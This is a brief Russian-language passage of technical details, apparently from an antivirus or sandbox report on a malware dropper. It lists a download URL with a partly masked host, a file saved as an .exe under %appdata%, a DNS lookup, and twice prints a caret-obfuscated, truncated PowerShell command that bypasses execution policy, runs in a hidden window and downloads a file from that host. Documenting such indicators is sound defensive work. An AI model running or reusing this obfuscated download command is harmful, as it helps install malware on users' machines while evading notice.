Техническая информация
- http://lt###.cheasrock.pl/file/jet.jkl как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^WERshEll.E^XE ^-eXecUTI^ONPo^liC^Y^ Bypa^s^s -^NOPr^o^Fi^le -wi^nDowst^Y^lE Hi^DDeN ^(neW-OBJ^Ect S^YS^Tem.neT.^WebCLie^NT)^.doW^nl^o^adfile('http://lt###.cheasrock.pl/file/je...
- DNS ASK lt###.cheasrock.pl
- '<SYSTEM32>\cmd.exe' /C "pO^WERshEll.E^XE ^-eXecUTI^ONPo^liC^Y^ Bypa^s^s -^NOPr^o^Fi^le -wi^nDowst^Y^lE Hi^DDeN ^(neW-OBJ^Ect S^YS^Tem.neT.^WebCLie^NT)^.doW^nl^o^adfile('http://lt###.cheasrock.pl/file/je...' (со скрытым окном)